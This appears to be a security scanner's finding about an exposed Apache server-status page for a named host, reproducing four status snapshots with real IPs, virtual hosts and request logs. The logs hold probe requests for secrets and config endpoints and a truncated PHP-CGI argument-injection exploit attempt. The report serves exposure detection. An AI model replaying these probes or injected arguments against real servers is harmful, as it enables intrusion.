Apache
tcp/443 tcp/80
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755d6e994dd
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 09-Jan-2026 23:33:48 CET Restart Time: Wednesday, 31-Dec-2025 22:29:29 CET Parent Server Config. Generation: 137 Parent Server MPM Generation: 136 Server uptime: 9 days 1 hour 4 minutes 19 seconds Server load: 0.00 0.02 0.00 Total accesses: 159300 - Total Traffic: 5.4 GB - Total Duration: 121349729 CPU Usage: u97.57 s81.27 cu1091.05 cs827.26 - .268% CPU load .204 requests/sec - 7.3 kB/second - 35.9 kB/request - 761.769 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01952857no3yes010000 11952856no1yes19000 21952855no1yes010000 31952858no2yes010001 41952988no1yes010000 Sum508 149001 ___________________W______________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-13619528570/127/2932_ 21.175016886970.06.2495.70 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-13619528570/138/2875_ 20.8616013534900.03.1796.36 162.158.230.120h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/131/2903_ 21.1713019641300.05.5481.74 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-13619528570/130/2905_ 20.8616015757500.015.51137.38 162.158.6.182h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/137/2922_ 21.172025490680.013.18109.84 172.71.148.75h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/149/2826_ 21.1216015041050.07.6386.74 172.71.151.11h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/146/2871_ 21.0616017933340.027.32116.75 172.69.34.170h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/157/2888_ 21.1711031818290.05.1985.57 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-13619528570/141/2867_ 20.8312142914140.014.5688.10 162.158.230.116h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/128/2801_ 21.1510015072090.03.65124.97 162.158.111.186h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-13619528560/387/3010_ 33.74141817479010.010.77102.26 172.68.134.213h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-13619528560/353/3058_ 33.818325114960.08.30129.62 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-13619528560/373/2977_ 33.711840121223530.012.15151.81 172.68.210.65h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-13619528560/355/3047_ 33.82132736239080.08.66104.80 172.68.134.212h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-13619528560/401/3000_ 33.8014320359280.016.4587.43 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-13619528560/375/2974_ 33.8215015140140.020.69114.57 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 1-13619528560/380/3042_ 33.7714038269900.018.09129.71 162.158.41.210h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-13619528560/386/3055_ 33.8219041770010.010.96120.66 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 1-13619528560/356/2941_ 33.73833915969160.09.64128.08 103.23.60.244http/1.1 1-13619528560/349/2959W 33.810019608250.015.95111.45 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-13619528550/55/3186_ 15.891263243700220.023.4391.89 172.70.142.84h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/49/3155_ 15.5411026010780.01.9478.11 162.158.230.147h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/52/3146_ 15.7515124616860.00.89102.66 172.70.215.99h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/60/3234_ 15.903014660770.02.53131.46 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-13619528550/62/3192_ 15.85155729537610.01.8389.35 172.68.135.35h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-13619528550/46/3274_ 15.5517027503430.01.0667.21 162.158.230.141h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/52/3151_ 15.760022484500.01.5772.38 172.69.34.164h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/60/3199_ 15.747021232680.01.5983.68 172.70.206.71h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/60/3176_ 15.877020917990.02.87126.39 162.158.111.163h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/58/3251_ 15.8912016632170.01.1496.28 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 3-13619528580/334/3573_ 33.440039549120.08.33111.03 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-13619528580/340/3555_ 33.45568417610810.025.08128.61 172.71.198.42h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/353/3546_ 33.383020914200.015.07125.75 172.71.151.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/340/3600_ 33.435018804280.09.10153.02 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-13619528580/352/3618_ 33.36032029522300.010.17156.97 172.71.254.237h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/337/3550_ 33.416024646660.08.3698.88 172.69.150.65h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/323/3567_ 33.446029489920.08.39112.59 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-13619528580/322/3506_ 33.461063552100.09.38131.70 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-13619528580/356/3544_ 33.441055785890.017.59165.77 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-13619528580/328/3553_ 33.462038622020.012.19101.44 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-13619529880/78/3315_ 18.141640219983360.03.84119.75 172.64.220.146h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-13619529880/84/3193_ 18.119014793880.05.9081.12 162.158.6.230h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-13619529880/98/3282_ 18.4610012195690.05.87109.65 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 4-13619529880/78/3248_ 18.4421011663660.06.17110.19 104.23.239.63h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-13619529880/84/3263_ 18.469016155990.02.41113.93 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7552625683a
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 30-Dec-2025 13:39:07 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 89 Parent Server MPM Generation: 88 Server uptime: 17 days 6 hours 35 minutes 1 second Server load: 0.11 0.10 0.09 Total accesses: 445818 - Total Traffic: 14.0 GB - Total Duration: 436616065 CPU Usage: u72.48 s75.27 cu2572.64 cs1662.16 - .294% CPU load .299 requests/sec - 9.8 kB/second - 32.9 kB/request - 979.359 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01779322no0yes010000 11779324no0yes010000 21779321no0yes010000 31779456no1yes19000 41779323no1yes010000 Sum502 149000 _______________________________W__________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8817793220/16/9846_ 8.0717052366330.00.33328.00 162.158.122.87h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-8817793220/13/10378_ 7.88140059035490.00.23309.46 188.114.111.41h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-8817793220/15/9956_ 8.1318089187570.00.20301.72 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 0-8817793220/17/10118_ 7.79139060647110.00.37288.98 162.158.116.99h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-8817793220/14/9868_ 8.07137052129040.00.24237.34 162.158.122.57h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-8817793220/15/10126_ 7.78140291126550.00.65287.77 162.158.116.99h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-8817793220/26/9983_ 8.07142065440260.00.70391.69 162.158.120.160h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-8817793220/16/10277_ 7.79139053933130.00.67270.37 162.158.116.151h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-8817793220/20/9857_ 7.80137099241690.00.28414.37 162.158.116.169h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-8817793220/16/10074_ 8.141058760910.00.22310.19 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-8817793240/13/8164_ 7.53140046591070.00.21324.79 104.22.23.42h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8817793240/12/8199_ 7.28139060292860.00.04209.67 162.158.116.75h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-8817793240/22/8124_ 7.53138060348890.00.37295.18 162.158.120.140h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8817793240/15/7961_ 7.27140055485480.00.24166.25 162.158.116.51h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8817793240/17/8265_ 7.52138056259190.00.21232.09 162.158.120.133h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8817793240/8/8056_ 7.28140065554870.00.01248.68 162.158.116.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8817793240/15/8038_ 7.531390169470480.00.68210.64 162.158.120.190h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8817793240/12/8138_ 6.53139053675720.00.06224.96 162.158.120.152h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8817793240/12/8005_ 7.53139083982420.00.35290.67 162.158.122.15h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8817793240/7/8245_ 7.53140053782810.00.12178.34 104.22.23.42h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8817793210/40/7993_ 7.82114044321260.01.03328.65 162.158.122.26h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8817793210/12/7980_ 6.821140863803320.00.39299.72 162.158.122.81h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8817793210/16/8040_ 7.55139048084780.00.11250.77 162.158.116.12h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8817793210/20/8025_ 7.81139096749820.00.48222.91 162.158.122.12h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8817793210/28/8089_ 4.89139050446240.00.54303.21 104.23.239.14h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8817793210/25/8091_ 7.55140041211700.00.22285.94 162.158.116.46h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8817793210/28/8074_ 5.571445159464410.00.19321.16 188.114.111.209h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8817793210/19/8058_ 7.6814050347691230.00.63261.27 172.71.82.52h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8817793210/18/7858_ 7.8311920846496460.00.51307.51 172.70.248.41h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8817793210/16/8192_ 7.82144053754790.00.65281.90 162.158.120.243h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-8817794560/274/9639_ 19.97643562158960.08.67291.02 172.70.143.207h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-8817794560/237/9487W 19.990078034570.010.36299.19 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-8817794560/272/9368_ 20.0011143790920.034.89377.53 62.171.148.101http/1.1barrerasdecontencion.com:443GET /wp-admin/css/ HTTP/1.1 3-8817794560/269/9550_ 19.995074031500.018.89297.74 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-8817794560/260/9799_ 19.987064383490.012.35322.38 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 3-8817794560/228/9297_ 19.89353959645750.08.96282.90 104.23.239.64h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-8817794560/253/9559_ 19.9990187750390.015.68280.72 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-8817794560/255/9733_ 19.997077290170.018.69433.01 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-8817794560/247/9621_ 19.9210169533250.012.42329.11 103.23.61.80http/1.1barrerasdecontencion.com:443POST /wp-cron.php?doing_wp_cron=1767098267.62325000762939453125 3-8817794560/234/9515_ 19.95031880095740.021.94307.06 62.171.148.101http/1.1 4-8817793230/186/8858_ 17.2910180106680.014.44326.06 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 4-8817793230/239/8603_ 17.303067418440.011.86229.24 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-8817793230/198/8796_ 17.29138584599480.07.98292.32 172.68.135.231h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-8817793230/178/8907_ 17.2745564755910.011.10298.92 172.68.135.20h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-8817793230/194/8773_ 17.304052559240.07.89287.56 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755576dbd25
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 26-Dec-2025 10:17:46 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 64 Parent Server MPM Generation: 63 Server uptime: 13 days 3 hours 13 minutes 40 seconds Server load: 0.06 0.06 0.06 Total accesses: 359138 - Total Traffic: 11.7 GB - Total Duration: 373188553 CPU Usage: u62.1 s65.38 cu2039.13 cs1271.08 - .303% CPU load .316 requests/sec - 10.8 kB/second - 34.0 kB/request - 1039.12 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01299522no1yes010000 11299392no0yes010000 21299390no0yes010000 31299391no0yes010000 41299389no0yes19000 Sum501 149000 ___________________________________________W______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-6312995220/234/8040_ 15.913035811630.03.49290.86 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-6312995220/254/8495_ 15.917046789140.03.09273.88 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 0-6312995220/252/8009_ 15.938075006950.05.20261.29 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-6312995220/236/8239_ 15.931040538440.030.55251.32 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-6312995220/254/8003_ 15.93810637921320.05.69195.51 84.123.121.52h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-6312995220/243/8238_ 15.86687884650520.03.23231.22 108.162.245.131h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6312995220/241/8059_ 15.913043075130.010.14353.43 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-6312995220/247/8413_ 15.939048253220.04.62231.70 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-6312995220/233/7978_ 15.919093476260.025.84358.31 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 0-6312995220/245/8211_ 15.931038485290.03.02257.60 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-6312993920/69/6157_ 9.35140031027560.00.69249.90 162.158.91.169h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/80/6083_ 9.70140137555390.00.66170.26 108.162.246.235h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/63/5984_ 9.31141045500460.00.39196.17 162.158.91.127h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-6312993920/73/5924_ 9.71140033641630.00.54119.82 108.162.246.130h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/66/6182_ 9.70140038575350.00.46193.96 108.162.245.138h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/78/6020_ 9.71140343657540.00.72189.18 108.162.245.191h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/78/5974_ 9.701400153216250.00.92169.82 108.162.245.9h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/69/6067_ 9.70139142094530.00.34186.89 108.162.245.179h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/73/5981_ 9.70140068771910.00.60225.50 108.162.245.147h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/77/6192_ 9.70139043334110.01.03140.98 162.159.120.232h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/219/6872_ 15.86141040958340.02.15302.22 108.162.246.98h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/210/6842_ 15.451410859618570.02.82255.92 172.70.211.138h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/228/6949_ 15.601401243610970.03.49224.17 84.123.121.52h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/227/6929_ 15.86141090997920.03.03199.74 108.162.246.98h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-6312993900/236/6906_ 15.46141444217000.02.27284.26 104.23.251.186h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/222/7027_ 15.85140036942140.04.32250.82 108.162.246.59h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/230/6939_ 15.47140053714670.05.15288.97 162.158.187.65h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-6312993900/228/6967_ 15.49140043192290.02.53222.32 172.70.210.162h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/217/6788_ 15.85140040765340.03.51287.24 108.162.245.134h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/222/7090_ 15.86141049462340.015.00223.38 108.162.245.5h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/38/8671_ 10.80141253585610.00.48269.62 108.162.246.48h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/41/8507_ 10.81140167219200.00.30260.71 108.162.245.185h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/36/8393_ 10.8014011132779960.00.39307.33 108.162.246.203h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/40/8552_ 10.83145059480530.00.53267.57 108.162.246.121h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/35/8800_ 10.82140057526930.01.30297.39 108.162.246.161h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-6312993910/37/8372_ 10.80141055580880.00.29253.87 108.162.245.254h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-6312993910/33/8599_ 10.821400182913900.01.00248.34 108.162.246.110h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/40/8756_ 10.83141060618500.00.75381.32 108.162.245.10h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/38/8667_ 10.83140057288770.00.36304.56 108.162.246.219h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/38/8567_ 10.82140050224820.07.45255.26 108.162.245.185h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-6312993890/15/6144_ 9.010112169419510.00.20251.18 84.123.121.52h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-6312993890/12/5976_ 8.934247468230.00.35163.82 108.162.245.17h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6312993890/9/6166_ 8.993065479200.00.09214.91 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 4-6312993890/17/6205W 9.000048666310.00.09239.14 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-6312993890/15/6203_ 9.002041939680.00.09178.68 159.89.127.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755892478ef
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 24-Dec-2025 10:34:05 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 56 Parent Server MPM Generation: 55 Server uptime: 11 days 3 hours 29 minutes 59 seconds Server load: 0.14 0.21 0.23 Total accesses: 327471 - Total Traffic: 10.8 GB - Total Duration: 262700223 CPU Usage: u34.06 s39.63 cu1852.34 cs1115.24 - .316% CPU load .34 requests/sec - 11.7 kB/second - 34.5 kB/request - 802.209 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01137311no1yes010000 11137224no0yes010000 21137222no0yes010000 31137223no2yes19001 41137177no0yes010000 Sum503 149001 _____________________________________W____________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5511373110/95/7075_ 5.2712033198060.01.25269.50 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5511373110/87/7515_ 5.2713038467020.01.55229.68 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 0-5511373110/85/7021_ 5.271070628630.01.20231.26 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 0-5511373110/91/7249_ 5.271279237015940.01.10201.25 172.70.248.179h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5511373110/88/7027_ 5.296032736510.01.23171.75 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-5511373110/93/7275_ 5.297075034660.00.89206.78 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-5511373110/84/7086_ 5.267037030120.00.61327.12 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 0-5511373110/95/7450_ 5.2732034417490.01.19211.36 188.114.111.92h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5511373110/101/7020_ 5.293034037860.01.08314.72 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-5511373110/88/7209_ 5.2612035511720.00.56223.92 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 1-5511372240/19/5636_ 2.04929029681520.00.67239.20 162.158.123.110h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5511372240/20/5571_ 2.37137036205300.00.07158.51 185.38.149.140http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-5511372240/20/5469_ 2.09864043972680.00.06185.03 172.68.134.15h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5511372240/18/5412_ 2.02928431147360.00.08110.26 162.158.123.192h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5511372240/21/5657_ 2.1486932937022510.00.10178.48 172.70.143.207h2tandemsl.com:443idle, streams: 0/1/1/0/0 